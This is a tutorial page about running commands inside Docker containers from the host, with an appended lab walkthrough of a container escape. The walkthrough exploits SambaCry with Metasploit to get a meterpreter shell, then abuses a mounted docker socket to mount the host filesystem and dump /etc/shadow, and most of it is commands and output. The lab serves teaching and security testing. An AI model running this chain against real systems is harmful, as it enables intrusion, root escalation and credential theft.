Execute the shell or program inside the Docker container on the host

Execute the shell or program inside the Docker container on the host

In order to avoid repeatedly entering the Docker container to operate, a series of instructions inside the container can be completed by the host machine.

Execute the "printer" executable program in the /usr directory of the centos container (named centos-1) on the host machine (the author's host is Windows 7), and the output of the program is to print "123".

C:\Users\Administrator>docker exec -it centos-1 /bin/bash -c "cd usr && ./printer" 123

success.

Additional knowledge: Using insecure deployment of Docker containers to gain host permissions

Preface

There are many ways to abuse containers and escape. This article will discuss the most basic one, which is to abuse the docker socket to escape the container and execute code as root on the host.

Experimental environment setup

Since we will be using containers, you must have docker installed.

Creating a network

First, we create a docker network where we will create the container:

docker network create pwnage

Start the vulnerable container

In this example, I will use a container affected by the SambaCry vulnerability (CVE-2017-7494). For more information about the vulnerability, see opsxcq/exploit-CVE-2017-7494.

This vulnerability allows you to execute remote code in the Samba server. We will add the docker socket to the container. Here is an example of abusing docker.

docker run --rm -it \
    --name vulnerable \
    --network-pwnage \
    -v '/var/run/docker.sock:/var/run/docker.sock' \
    vulnerables/cve-2017-7494

Start attack aircraft

After the lab environment is set up, we need to add the attacker's host to the network. There is an exploit available in the Samba Cry repository, but I will be using Metasploit here as it is easier to upload what I need.

I have built an image for this, just run the bellow command and everything will run as needed for the lab environment:

docker run --rm -it \
    --network-pwnage \
    -v '/usr/bin/docker:/docker:ro' \
    strm/metasploit

After loading is complete, you will see the following interface.

Attack Exploitation

Information Collection

Information gathering is an essential part of any attack or test. So, let’s first ping the vulnerable container to check the current connectivity.

ping -c 2 vulnerable

If everything went well, you should see the following output.

msf5 > ping -c 2 vulnerable 
[*] exec: ping -c 2 vulnerable 
 
PING vulnerable (172.20.0.2) 56(84) bytes of data.
64 bytes from vulnerable.pwnage (172.20.0.2): icmp_seq=1 ttl=64 time=0.120 ms
64 bytes from vulnerable.pwnage (172.20.0.2): icmp_seq=2 ttl=64 time=0.097 ms
 
--- vulnerable ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1009ms
rtt min/avg/max/mdev = 0.097/0.108/0.120/0.015 ms

We then do a basic smb share enumeration:

use auxiliary/scanner/smb/smb_enumshares
set rhosts vulnerable
run

The output is as follows:

msf5 > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > set rhosts vulnerable
rhosts => vulnerable
msf5 auxiliary(scanner/smb/smb_enumshares) > run
 
[+] 172.20.0.2:139 - data - (DS) Data
[+] 172.20.0.2:139 - IPC$ - (I) IPC Service (Crying samba)
[*] vulnerable: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As you can see, there is a share named data in this samba server.

Get a shell

The next step is to run the exploit against the host machine to get a shell. In Metasploit, the vulnerability is named is_known_pipename and is located at exploit/linux/samba/is_known_pipename.

Run the bellow command to attack the host:

use exploit/linux/samba/is_known_pipename
set RHOST vulnerable
set RPORT 445
set payload linux/x64/meterpreter/bind_tcp
set TARGET 3
set SMB_FOLDER data
set SMBUser sambacry
set SMBPass nosambanocry
exploit

If everything goes well, you will get a meterpreter shell. as follows:

msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > set RHOST vulnerable
RHOST => vulnerable
msf5 exploit(linux/samba/is_known_pipename) > set RPORT 445
RPORT => 445
msf5 exploit(linux/samba/is_known_pipename) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf5 exploit(linux/samba/is_known_pipename) > set TARGET 3
TARGET => 3
msf5 exploit(linux/samba/is_known_pipename) > set SMB_FOLDER data
SMB_FOLDER => data
msf5 exploit(linux/samba/is_known_pipename) > set SMBUser sambacry
SMBUser => sambacry
msf5 exploit(linux/samba/is_known_pipename) > set SMBPass nosambanocry
SMBPass => nosambanocry
msf5 exploit(linux/samba/is_known_pipename) > exploit
 
[*] vulnerable:445 - Using location \\vulnerable\data\ for the path
[*] vulnerable:445 - Retrieving the remote path of the share 'data'
[*] vulnerable:445 - Share 'data' has server-side path '/data
[*] vulnerable:445 - Uploaded payload to \\vulnerable\data\shyyEPPk.so
[*] vulnerable:445 - Loading the payload from server-side path /data/shyyEPPk.so using \\PIPE\/data/shyyEPPk.so...
[-] vulnerable:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] vulnerable:445 - Loading the payload from server-side path /data/shyyEPPk.so using /data/shyyEPPk.so...
[-] vulnerable:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Started bind TCP handler against vulnerable:4444
[*] Sending stage (816260 bytes) to vulnerable
 
meterpreter >

Privilege Escalation

We will escalate privileges by abusing the docker socket available inside the container. Since Docker runs as root on the host machine, it also has root permissions. We can abuse this to perform multiple actions. For example, using the --privileged option can provide us with many extended functions. The following is the explanation text extracted from the Docker official documentation:

By default, Docker containers have no privileges, for example, you cannot start a container within a container. This is because by default containers cannot access any other devices. But by being "privileged", the container has the ability to access any other device. When the operator executes docker run --privileged, Docker will have access to all devices on the host. At the same time, Docker will also make some settings in apparmor or selinux so that the container can easily access devices running outside the container.

You can access devices using the --device option. But in this example, I will map the toor file system (/) into the container and access it.

Since there is no docker client in this container, the next thing we need to do is to set up the docker client and its dependencies in the target container. You can do all of this by simply running the following command.

upload /docker /docker
upload /usr/lib/x86_64-linux-gnu/libltdl.so.7 /usr/lib/x86_64-linux-gnu/libltdl.so.7
chmod 777 /docker
chmod +x /docker
meterpreter > upload /docker /docker
[*] uploading : /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] uploaded : /docker -> /docker
meterpreter > upload /usr/lib/x86_64-linux-gnu/libltdl.so.7 /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] uploading: /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] Uploaded -1.00 B of 38.47 KiB (-0.0%): /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] uploaded : /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
meterpreter > chmod 777 /docker
meterpreter > chmod +x /docker
meterpreter >

Now, we can use docker to access the file system on the host machine. \

execute -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"

Let's dump the hash of the local user. The output is as follows:

meterpreter > execute -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"
Process 113 created.
Channel 13 created.
root:$1$UFKdtFGw$qp29y1qGWit/vnvIG0uSr1:17488:0:99999:7:::
daemon:*:17488:0:99999:7:::
bin:*:17488:0:99999:7:::
sys:*:17488:0:99999:7:::
sync:*:17488:0:99999:7:::
games:*:17488:0:99999:7:::
man:*:17488:0:99999:7:::
lp:*:17488:0:99999:7:::
mail:*:17488:0:99999:7:::
news:*:17488:0:99999:7:::

The above article on how to execute shell or program inside a docker container on the host is all I have to share with you. I hope it can give you a reference, and I also hope that you will support 123WORDPRESS.COM.

You may also be interested in:
  • Docker enables seamless calling of shell commands between container and host
  • Solution to the Docker container not having permission to write to the host directory
  • Solution to the Docker container being unable to access the host port
  • Call and execute host docker operations in docker container
  • Detailed explanation of how to solve the problem that the docker container cannot access the host machine through IP
  • How to use Docker container to access host network
  • Solve the problem of 8 hours difference between docker container and host machine

<<:  5 commonly used objects in JavaScript

>>:  A complete list of meta tag settings for mobile devices

Recommend

Troubleshooting the reasons why MySQL deleted records do not take effect

A record of an online MySQL transaction problem L...

Database issues and pitfalls in connecting to cloud servers with Navicat Premium15

When using a cloud server, we sometimes connect t...

JavaScript color viewer

This article example shares the specific code of ...

JavaScript form validation example

HTML forms are commonly used to collect user info...

Use shell script to install python3.8 environment in CentOS7 (recommended)

One-click execution To install Python 3.8 in a vi...

Multiple methods to modify MySQL root password (recommended)

Method 1: Use the SET PASSWORD command MySQL -u r...

Process analysis of deploying ASP.NET Core applications on Linux system Docker

Table of contents 1. System environment 2. Operat...

MySQL tutorial DML data manipulation language example detailed explanation

Table of contents 1. Data Manipulation Language (...

How to reference jQuery in a web page

It can be referenced through CDN (Content Delivery...

Understanding and application scenarios of enumeration types in TypeScript

Table of contents 1. What is 2. Use Numeric Enume...

Set IE8 to use IE7 style code

<meta http-equiv="x-ua-compatible" co...

CSS style reset and clear (to make different browsers display the same effect)

In order to make the page display consistent betwe...

How to migrate mysql storage location to a new disk

1. Prepare a new disk and format it with the same...

Detailed explanation of the difference between CSS link and @import

How to add css in html? There are three ways to s...

Detailed analysis of classic JavaScript recursion case questions

Table of contents What is recursion and how does ...